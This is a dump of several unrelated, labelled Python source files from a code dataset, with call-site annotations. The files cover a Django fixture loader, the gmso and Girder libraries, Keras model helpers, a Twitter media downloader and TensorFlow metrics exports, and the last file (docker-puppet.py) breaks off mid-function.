[((20, 41, 20, 69), 'commons.helpers.dataset.strategies.galaxy_dataset.label_strategy.GalaxyDataSetLabelStrategy', 'GalaxyDataSetLabelStrategy', ({}, {}), '()', False, 'from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy\n'), ((23, 18, 23, 57), 'commons.helpers.dataset.context.Context', 'Context', ({(23, 26, 23, 56): 'galaxy_label_data_set_strategy'}, {}), '(galaxy_label_data_set_strategy)', False, 'from commons.helpers.dataset.context import Context\n'), ((31, 27, 31, 67), 'core.feature_extraction.galaxy.galaxy_processor.GalaxyProcessor', 'GalaxyProcessor', ({(31, 43, 31, 66): 'self.galaxy_images_path'}, {}), '(self.galaxy_images_path)', False, 'from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor\n'), ((26, 61, 26, 88), 'numpy.float32', 'np.float32', ({(26, 72, 26, 87): 'validation_size'}, {}), '(validation_size)', True, 'import numpy as np\n')]
okchaty/django-country
country/management/commands/populate_countries.py
740bc25956dc1b87f44486538a62037e0bd0ac94
from django.conf import settings from django.core.management import call_command from django.core.management.base import BaseCommand from os import path class Command(BaseCommand): help = "Populates data" def handle(self, *args, **options): fixture_path = path.join(path.dirname( path.dirname( path.dirname( path.abspath(__file__) ) ) ), "fixtures/") settings.FIXTURE_DIRS = (fixture_path,) call_command("loaddata", "country", verbosity=1)
[((19, 8, 19, 56), 'django.core.management.call_command', 'call_command', (), '', False, 'from django.core.management import call_command\n'), ((14, 20, 14, 42), 'os.path.abspath', 'path.abspath', ({(14, 33, 14, 41): '__file__'}, {}), '(__file__)', False, 'from os import path\n')]
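A brief usage sketch for the management command above — hypothetical, assuming the Django project's settings are configured and a `country` fixture exists under the computed fixtures/ directory (the command name comes from the module's filename):

# Hypothetical usage: invoke the command programmatically,
# equivalent to running `python manage.py populate_countries`.
from django.core.management import call_command

call_command("populate_countries")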
chrisiacovella/gmso
gmso/formats/formats_registry.py
c78e2425ccb98ea952f024a569346d36045f6918
"""Registry utilities to handle formats for gmso Topology.""" class UnsupportedFileFormatError(Exception): """Exception to be raised whenever the file loading or saving is not supported.""" class Registry: """A registry to incorporate a callable with a file extension.""" def __init__(self): self.handlers = {} def _assert_can_process(self, extension): if extension not in self.handlers: raise UnsupportedFileFormatError( f"Extension {extension} cannot be processed as no utility " f"is defined in the current API to handle {extension} files." ) def get_callable(self, extension): """Get the callable associated with extension.""" self._assert_can_process(extension) return self.handlers[extension] SaversRegistry = Registry() LoadersRegistry = Registry() class saves_as: """Decorator to aid saving.""" def __init__(self, *extensions): extension_set = set(extensions) self.extensions = extension_set def __call__(self, method): """Register the method as saver for an extension.""" for ext in self.extensions: SaversRegistry.handlers[ext] = method return method class loads_as: """Decorator to aid loading.""" def __init__(self, *extensions): extension_set = set(extensions) self.extensions = extension_set def __call__(self, method): """Register the method as loader for an extension.""" for ext in self.extensions: LoadersRegistry.handlers[ext] = method return method
[]
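A minimal usage sketch for the registry/decorator pair above — the ".xyz" extension and save_xyz function are made-up placeholders, and the sketch assumes the definitions above are in scope:

# Hypothetical sketch: register a saver for a made-up extension and look it up.
@saves_as(".xyz")
def save_xyz(topology, filename):
    print("saving", topology, "to", filename)

writer = SaversRegistry.get_callable(".xyz")   # returns save_xyz
writer("my_topology", "out.xyz")
# An extension with no registered handler raises UnsupportedFileFormatError.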
Staist/Python-Text-Formatter
formatter.py
6ae865d45301906eaa133551301dc785602f5b38
dosyaadi = input("Enter file name: ")  # dosyaadi: name of the text file to edit
dosyaadi = str(dosyaadi + ".txt")

# Read the whole file (dosyaicerigi: file contents)
with open(dosyaadi, 'r') as file:
    dosyaicerigi = file.read()

# Remove every occurrence of the text to delete (silinecek)
silinecek = str(input("Enter the text that you wish to delete: "))
dosyaicerigi = dosyaicerigi.replace(silinecek, '')

# Write the filtered contents back (the with block closes the file itself)
with open(dosyaadi, 'w') as file:
    file.write(dosyaicerigi)

print("-" * 30)
print("Successfully deleted!")
print("-" * 30)
[]
salvacarrion/mltests
covid19/classification/helpers.py
e4ac9711c1c80171f302edc88011fbe06e754490
import tensorflow as tf @tf.function def BinaryAccuracy_Infiltrates(y_true, y_pred, i=0): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) @tf.function def BinaryAccuracy_Pneumonia(y_true, y_pred, i=1): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) @tf.function def BinaryAccuracy_Covid19(y_true, y_pred, i=2): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) @tf.function def BinaryAccuracy_Normal(y_true, y_pred, i=3): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.wait_epoch_warmup = kwargs.get("wait_epoch_warmup") def on_epoch_end(self, epoch, logs=None): if self.wait_epoch_warmup: if (epoch + 1) >= self.wait_epoch_warmup: super().on_epoch_end(epoch, logs) else: self.epochs_since_last_save += 1 print(f"Skipping save model (wait_epoch_warmup={self.wait_epoch_warmup - (epoch + 1)})") else: super().on_epoch_end(epoch, logs) class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping): def __init__(self, *args, **kwargs): self.minimum_epochs = kwargs.get("minimum_epochs", 0) kwargs.pop('minimum_epochs', None) # Problems with EarlyStopping kwargs super().__init__(*args, **kwargs) def on_epoch_end(self, epoch, logs=None): if epoch >= self.minimum_epochs: super().on_epoch_end(epoch, logs) def get_losses(): losses = [tf.keras.losses.BinaryCrossentropy()] return losses def get_metrics(single_output_idx, add_normal=False): metrics = [] if single_output_idx is None: # Multi-label print("###### Multi-label classification ######") metrics += [ BinaryAccuracy_Infiltrates, BinaryAccuracy_Pneumonia, BinaryAccuracy_Covid19 ] # Add normal class if add_normal: metrics.append(BinaryAccuracy_Normal) else: print(f"###### Multi-class classification (cls: '{single_output_idx}') ######") metrics = [ tf.keras.metrics.BinaryAccuracy(), tf.keras.metrics.AUC(), tf.keras.metrics.Precision(), tf.keras.metrics.Recall() ] return metrics def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None): istrainable = not freeze_base_model # Select backbone if backbone == "resnet50": from tensorflow.keras.applications.resnet import ResNet50 as TFModel from tensorflow.keras.applications.resnet import preprocess_input elif backbone == "resnet50v2": from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel from tensorflow.keras.applications.resnet_v2 import preprocess_input elif backbone == "resnet101v2": from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel from tensorflow.keras.applications.resnet_v2 import preprocess_input elif backbone == "vgg16": from tensorflow.keras.applications.vgg16 import VGG16 as TFModel from tensorflow.keras.applications.vgg16 import preprocess_input elif backbone == "efficientnetb0": from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel from tensorflow.keras.applications.efficientnet import preprocess_input elif backbone == "efficientnetb7": from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel from tensorflow.keras.applications.efficientnet import preprocess_input else: raise ValueError(f"Unknown backbone: {backbone}") if ignore_model: model = None else: # Instantiate base model with pre-trained weights base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet") # Freeze base model # base_model.trainable = istrainable for 
layers in base_model.layers: layers.trainable = istrainable # Create a new model on top inputs = base_model.input x = base_model(inputs) # Option A x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x) # Option B # x = tf.keras.layers.Flatten(name='flatten')(x) # x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x) # x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x) # Outputs outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x) model = tf.keras.Model(inputs, outputs) return model, preprocess_input def add_tabular_input(model, classes): # Input1 input1 = model.input input2 = tf.keras.layers.Input(shape=(2,), name="input_2b") # Pre-outputs 1x3 + 1x3 output1 = model.output output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2) # Outputs x = tf.keras.layers.Concatenate(axis=1)([output1, output2]) output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x) model = tf.keras.Model([input1, input2], output) return model def unfreeze_base_model(model, n=None, unfreeze=True): base_model = model.layers[1].layers # Select number of layers to unfreeze idx = 0 if n is not None: if isinstance(n, int): idx = n print(f"Unfreezing {len(base_model) - idx} layers") elif isinstance(n, float) and 0.0 < n <= 1.0: idx = int(len(base_model) * n) print(f"Unfreezing {idx} layers") else: raise ValueError("Invalid number of layers") # We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights) for layer in base_model[-idx:]: if not isinstance(layer, tf.keras.layers.BatchNormalization): layer.trainable = True
[((6, 11, 6, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(6, 44, 6, 56): 'y_true[:, (i)]', (6, 58, 6, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((11, 11, 11, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(11, 44, 11, 56): 'y_true[:, (i)]', (11, 58, 11, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((16, 11, 16, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(16, 44, 16, 56): 'y_true[:, (i)]', (16, 58, 16, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((21, 11, 21, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(21, 44, 21, 56): 'y_true[:, (i)]', (21, 58, 21, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((139, 13, 139, 63), 'tensorflow.keras.layers.Input', 'tf.keras.layers.Input', (), '', True, 'import tensorflow as tf\n'), ((148, 12, 148, 52), 'tensorflow.keras.Model', 'tf.keras.Model', ({(148, 27, 148, 43): '[input1, input2]', (148, 45, 148, 51): 'output'}, {}), '([input1, input2], output)', True, 'import tensorflow as tf\n'), ((53, 14, 53, 50), 'tensorflow.keras.losses.BinaryCrossentropy', 'tf.keras.losses.BinaryCrossentropy', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((110, 21, 110, 98), 'tensorflow.keras.applications.efficientnet.EfficientNetB7', 'TFModel', (), '', True, 'from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel\n'), ((131, 16, 131, 47), 'tensorflow.keras.Model', 'tf.keras.Model', ({(131, 31, 131, 37): 'inputs', (131, 39, 131, 46): 'outputs'}, {}), '(inputs, outputs)', True, 'import tensorflow as tf\n'), ((143, 14, 143, 85), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (), '', True, 'import tensorflow as tf\n'), ((146, 8, 146, 43), 'tensorflow.keras.layers.Concatenate', 'tf.keras.layers.Concatenate', (), '', True, 'import tensorflow as tf\n'), ((147, 13, 147, 91), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (), '', True, 'import tensorflow as tf\n'), ((73, 12, 73, 45), 'tensorflow.keras.metrics.BinaryAccuracy', 'tf.keras.metrics.BinaryAccuracy', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((74, 12, 74, 34), 'tensorflow.keras.metrics.AUC', 'tf.keras.metrics.AUC', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((75, 12, 75, 40), 'tensorflow.keras.metrics.Precision', 'tf.keras.metrics.Precision', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((76, 12, 76, 37), 'tensorflow.keras.metrics.Recall', 'tf.keras.metrics.Recall', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((122, 12, 122, 67), 'tensorflow.keras.layers.GlobalAveragePooling2D', 'tf.keras.layers.GlobalAveragePooling2D', (), '', True, 'import tensorflow as tf\n'), ((130, 18, 130, 90), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (), '', True, 'import tensorflow as tf\n')]
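A rough usage sketch for the helpers above — hypothetical wiring with illustrative backbone, image size, and callback settings; downloading the 'imagenet' weights requires network access:

# Hypothetical sketch: 3-label multi-label setup, mirroring get_metrics' default branch.
model, preprocess_input = get_model("resnet50", classes=3, target_size=(224, 224))
model.compile(optimizer="adam",
              loss=get_losses(),
              metrics=get_metrics(single_output_idx=None))

callbacks = [
    CustomEarlyStopping(monitor="val_loss", patience=5, minimum_epochs=10),
    CustomModelCheckpoint("best_model.h5", save_best_only=True),
]
# model.fit(train_images, train_labels, validation_split=0.1, epochs=50, callbacks=callbacks)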
mikoim/funstuff
null/twitter/twmedia-dl.py
3c391c76784a4bb37983c1a251773bfa61182ce1
import re import json import time import sys import httplib2 from twitter import * import magic class TwitterMediaDL: http = httplib2.Http(".cache") baseUrl = "https://twitter.com" consumer_key = "" consumer_secret = "" access_token_key = "" access_token_secret = "" t = Twitter(auth=OAuth(access_token_key, access_token_secret, consumer_key, consumer_secret)) remaining = None def http_wrapper(self, uri): resp, content = self.http.request( uri=uri, method='GET' ) return content def get_medias(self, nickname): ids = [] for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)", self.http_wrapper(self.baseUrl + '/%s/media' % nickname).decode()): ids.append(int(tweet[1])) max_id = ids[len(ids) - 1] while 1: res_raw = self.http_wrapper( self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % ( nickname, max_id)).decode() try: res = json.loads(res_raw) except: print(res_raw) time.sleep(5) res_raw = self.http_wrapper( self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % ( nickname, max_id)).decode() res = json.loads(res_raw) if not res['has_more_items']: break for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)", res['items_html']): ids.append(int(tweet[1])) max_id = int(res['max_id']) return list(set(ids)) def get_image_url(self, tweet_id): lst = [] if self.remaining is None or self.remaining % 10 is 0 or self.remaining <= 1: self.check_limit() r = self.t.statuses.show(_id=tweet_id, _method='GET') self.remaining -= 1 print('{:d}\t{:d}\t{:s}'.format(tweet_id, self.get_unix_epoch(r['created_at']), r['text'])) for m in r['entities']['media']: lst.append(m['media_url'] + ':orig') return lst def check_limit(self): r = self.t.application.rate_limit_status(_method='GET')['resources']['statuses']['/statuses/show/:id'] self.remaining = r['remaining'] print("API Limit : {:d} / {:d} = {:f}".format(r['remaining'], r['limit'], r['remaining'] / r['limit']), file=sys.stderr) if r['remaining'] / r['limit'] < 0.10: reset = r['reset'] - time.time() print("Please wait... {:f}".format(reset), file=sys.stderr) time.sleep(reset + 10) @staticmethod def get_file_extension(binary): mime = magic.from_buffer(binary, True).decode() return mime.split('/')[1] @staticmethod def get_unix_epoch(created_at): return int(time.mktime(time.strptime(created_at, "%a %b %d %H:%M:%S +0000 %Y"))) if __name__ == '__main__': for i in range(1, len(sys.argv)): tw = TwitterMediaDL() for tweetID in tw.get_medias(sys.argv[i]): list_url = tw.get_image_url(tweetID) for j in range(0, len(list_url)): raw = tw.http_wrapper(list_url[j]) ext = tw.get_file_extension(raw) with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f: f.write(raw)
[((12, 11, 12, 34), 'httplib2.Http', 'httplib2.Http', ({(12, 25, 12, 33): '""".cache"""'}, {}), "('.cache')", False, 'import httplib2\n'), ((57, 25, 57, 90), 're.findall', 're.findall', ({(57, 36, 57, 70): '"""twitter.com/(.+)/status/([0-9]+)"""', (57, 72, 57, 89): "res['items_html']"}, {}), "('twitter.com/(.+)/status/([0-9]+)', res['items_html'])", False, 'import re\n'), ((90, 12, 90, 34), 'time.sleep', 'time.sleep', ({(90, 23, 90, 33): '(reset + 10)'}, {}), '(reset + 10)', False, 'import time\n'), ((45, 22, 45, 41), 'json.loads', 'json.loads', ({(45, 33, 45, 40): 'res_raw'}, {}), '(res_raw)', False, 'import json\n'), ((88, 33, 88, 44), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((94, 15, 94, 46), 'magic.from_buffer', 'magic.from_buffer', ({(94, 33, 94, 39): 'binary', (94, 41, 94, 45): 'True'}, {}), '(binary, True)', False, 'import magic\n'), ((99, 31, 99, 86), 'time.strptime', 'time.strptime', ({(99, 45, 99, 55): 'created_at', (99, 57, 99, 85): '"""%a %b %d %H:%M:%S +0000 %Y"""'}, {}), "(created_at, '%a %b %d %H:%M:%S +0000 %Y')", False, 'import time\n'), ((48, 16, 48, 29), 'time.sleep', 'time.sleep', ({(48, 27, 48, 28): '(5)'}, {}), '(5)', False, 'import time\n'), ((52, 22, 52, 41), 'json.loads', 'json.loads', ({(52, 33, 52, 40): 'res_raw'}, {}), '(res_raw)', False, 'import json\n')]
DEVESHTARASIA/tensorflow
tensorflow/contrib/metrics/__init__.py
d3edb8c60ed4fd831d62833ed22f5c23486c561c
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Ops for evaluation metrics and summary statistics. See the @{$python/contrib.metrics} guide. @@streaming_accuracy @@streaming_mean @@streaming_recall @@streaming_recall_at_thresholds @@streaming_precision @@streaming_precision_at_thresholds @@streaming_auc @@streaming_curve_points @@streaming_recall_at_k @@streaming_mean_absolute_error @@streaming_mean_iou @@streaming_mean_relative_error @@streaming_mean_squared_error @@streaming_mean_tensor @@streaming_root_mean_squared_error @@streaming_covariance @@streaming_pearson_correlation @@streaming_mean_cosine_distance @@streaming_percentage_less @@streaming_sensitivity_at_specificity @@streaming_sparse_average_precision_at_k @@streaming_sparse_average_precision_at_top_k @@streaming_sparse_precision_at_k @@streaming_sparse_precision_at_top_k @@streaming_sparse_recall_at_k @@streaming_specificity_at_sensitivity @@streaming_concat @@streaming_false_negatives @@streaming_false_negatives_at_thresholds @@streaming_false_positives @@streaming_false_positives_at_thresholds @@streaming_true_negatives @@streaming_true_negatives_at_thresholds @@streaming_true_positives @@streaming_true_positives_at_thresholds @@auc_using_histogram @@accuracy @@aggregate_metrics @@aggregate_metric_map @@confusion_matrix @@set_difference @@set_intersection @@set_size @@set_union """ from __future__ import absolute_import from __future__ import division from __future__ import print_function # pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import from tensorflow.contrib.metrics.python.metrics import * # pylint: enable=wildcard-import from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean from tensorflow.contrib.metrics.python.ops.metric_ops import 
streaming_mean_absolute_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds from tensorflow.contrib.metrics.python.ops.set_ops import set_difference from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection from tensorflow.contrib.metrics.python.ops.set_ops import set_size from tensorflow.contrib.metrics.python.ops.set_ops import set_union # pylint: enable=unused-import,line-too-long from tensorflow.python.util.all_util import remove_undocumented remove_undocumented(__name__)
[((118, 0, 118, 29), 'tensorflow.python.util.all_util.remove_undocumented', 'remove_undocumented', ({(118, 20, 118, 28): '__name__'}, {}), '(__name__)', False, 'from tensorflow.python.util.all_util import remove_undocumented\n')]
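A short example for one of the re-exported ops above — hypothetical and TF 1.x-specific (tf.contrib was removed in TensorFlow 2.x), with made-up label/prediction values:

# Hypothetical sketch: streaming (running-average) accuracy over one batch.
import tensorflow as tf

labels = tf.constant([1, 0, 1, 1])
predictions = tf.constant([1, 0, 0, 1])
accuracy, update_op = tf.contrib.metrics.streaming_accuracy(predictions, labels)

with tf.Session() as sess:
    sess.run(tf.local_variables_initializer())
    sess.run(update_op)          # accumulate this batch
    print(sess.run(accuracy))    # 0.75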
scottwittenburg/girder
girder/models/group.py
a5062badc97bf2a87a385648f2ff3f9ff1990a75
#!/usr/bin/env python # -*- coding: utf-8 -*- ############################################################################### # Copyright 2013 Kitware Inc. # # Licensed under the Apache License, Version 2.0 ( the "License" ); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### import datetime from .model_base import AccessControlledModel,\ ValidationException,\ AccessException from girder.constants import AccessType class Group(AccessControlledModel): """ Groups are simply groups of users. The primary use of grouping users is to simplify access control for resources in the system, but they can be used for other purposes that require groupings of users as well. Group membership is stored in the database on the user document only; there is no "users" field in this model. This is to optimize for the most common use case for querying membership, which involves checking access control policies, which is always done relative to a specific user. The task of querying all members within a group is much less common and typically only performed ona single group at a time, so doing a find on the indexed group list in the user collection is sufficiently fast. Users with READ access on the group can see the group and its members. Users with WRITE access on the group can add and remove members and change the name or description. Users with ADMIN access can delete the entire group. """ def initialize(self): self.name = 'group' self.ensureIndices(['lowerName']) self.ensureTextIndex({ 'name': 10, 'description': 1 }) def validate(self, doc): doc['name'] = doc['name'].strip() doc['lowerName'] = doc['name'].lower() doc['description'] = doc['description'].strip() if not doc['name']: raise ValidationException('Group name must not be empty.', 'name') q = { 'lowerName': doc['lowerName'], } if '_id' in doc: q['_id'] = {'$ne': doc['_id']} duplicates = self.find(q, limit=1, fields=['_id']) if duplicates.count() != 0: raise ValidationException('A group with that name already' 'exists.', 'name') return doc def list(self, user=None, limit=50, offset=0, sort=None): """ Search for groups or simply list all visible groups. :param text: Pass this to perform a text search of all groups. :param user: The user to search as. :param limit: Result set size limit. :param offset: Offset into the results. :param sort: The sort direction. """ # Perform the find; we'll do access-based filtering of the result # set afterward. cursor = self.find({}, limit=0, sort=sort) for r in self.filterResultsByPermission(cursor=cursor, user=user, level=AccessType.READ, limit=limit, offset=offset): yield r def remove(self, group): """ Delete a group, and all references to it in the database. :param group: The group document to delete. 
:type group: dict """ # Remove references to this group from user group membership lists self.model('user').update({ 'groups': group['_id'] }, { '$pull': {'groups': group['_id']} }) acQuery = { 'access.groups.id': group['_id'] } acUpdate = { '$pull': { 'access.groups': {'id': group['_id']} } } # Remove references to this group from access-controlled collections. self.update(acQuery, acUpdate) self.model('collection').update(acQuery, acUpdate) self.model('folder').update(acQuery, acUpdate) self.model('user').update(acQuery, acUpdate) # Finally, delete the document itself AccessControlledModel.remove(self, group) def getMembers(self, group, offset=0, limit=50, sort=None): """ Return the list of all users who belong to this group. :param group: The group to list members on. :param offset: Offset into the result set of users. :param limit: Result set size limit. :param sort: Sort parameter for the find query. :returns: List of user documents. """ q = { 'groups': group['_id'] } cursor = self.model('user').find( q, offset=offset, limit=limit, sort=sort) users = [] for user in cursor: users.append(user) return users def addUser(self, group, user, level=AccessType.READ): """ Add the user to the group. Records membership in the group in the user document, and also grants the specified access level on the group itself to the user. Any group member has at least read access on the group. """ if not 'groups' in user: user['groups'] = [] if not group['_id'] in user['groups']: user['groups'].append(group['_id']) self.model('user').save(user, validate=False) self.setUserAccess(group, user, level, save=True) return group def joinGroup(self, group, user): """ Call this when the user accepts an invitation. """ if not 'groupInvites' in user: user['groupInvites'] = [] for invite in user['groupInvites']: if invite['groupId'] == group['_id']: self.addUser(group, user, level=invite['level']) user['groupInvites'].remove(invite) self.model('user').save(user, validate=False) break else: raise AccessException('User was not invited to this group.') return group def inviteUser(self, group, user, level=AccessType.READ): """ Invite a user to join the group. Inviting them automatically grants the user read access to the group so that they can see it. Once they accept the invitation, they will be given the specified level of access. """ # User has to be able to see the group to join it self.setUserAccess(group, user, AccessType.READ, save=True) if group['_id'] in user.get('groups', []): raise ValidationException('User is already in this group.') if not 'groupInvites' in user: user['groupInvites'] = [] for invite in user['groupInvites']: if invite['groupId'] == group['_id']: invite['level'] = level break else: user['groupInvites'].append({ 'groupId': group['_id'], 'level': level }) return self.model('user').save(user, validate=False) def removeUser(self, group, user): """ Remove the user from the group. """ # Remove group membership for this user. if 'groups' in user and group['_id'] in user['groups']: user['groups'].remove(group['_id']) self.model('user').save(user, validate=False) # Remove all group access for this user on this group. self.setUserAccess(group, user, level=None, save=True) return group def createGroup(self, name, creator, description='', public=True): """ Create a new group. The creator will be given admin access to it. :param name: The name of the folder. :type name: str :param description: Description for the folder. :type description: str :param public: Whether the group is publicly visible. 
:type public: bool :param creator: User document representing the creator of the group. :type creator: dict :returns: The group document that was created. """ assert type(public) is bool now = datetime.datetime.now() group = { 'name': name, 'description': description, 'created': now, 'updated': now } self.setPublic(group, public=public) # Now validate and save the group self.save(group) # We make the creator a member of this group and also grant them # admin access over the group. self.addUser(group, creator, level=AccessType.ADMIN) return group
[((243, 14, 243, 37), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n')]
mail2nsrajesh/tripleo-heat-templates
docker/docker-puppet.py
368b3eadda577f9914d181893df2df96367e8fad
#!/usr/bin/env python # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # Shell script tool to run puppet inside of the given docker container image. # Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON # array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings # that can be used to generate config files or run ad-hoc puppet modules # inside of a container. import glob import json import logging import os import sys import subprocess import sys import tempfile import multiprocessing log = logging.getLogger() ch = logging.StreamHandler(sys.stdout) if os.environ.get('DEBUG', False): log.setLevel(logging.DEBUG) ch.setLevel(logging.DEBUG) else: log.setLevel(logging.INFO) ch.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s') ch.setFormatter(formatter) log.addHandler(ch) # this is to match what we do in deployed-server def short_hostname(): subproc = subprocess.Popen(['hostname', '-s'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() return cmd_stdout.rstrip() def pull_image(name): log.info('Pulling image: %s' % name) subproc = subprocess.Popen(['/usr/bin/docker', 'pull', name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr: log.debug(cmd_stderr) def match_config_volume(prefix, config): # Match the mounted config volume - we can't just use the # key as e.g "novacomute" consumes config-data/nova volumes = config.get('volumes', []) config_volume=None for v in volumes: if v.startswith(prefix): config_volume = os.path.relpath( v.split(":")[0], prefix).split("/")[0] break return config_volume def get_config_hash(prefix, config_volume): hashfile = os.path.join(prefix, "%s.md5sum" % config_volume) hash_data = None if 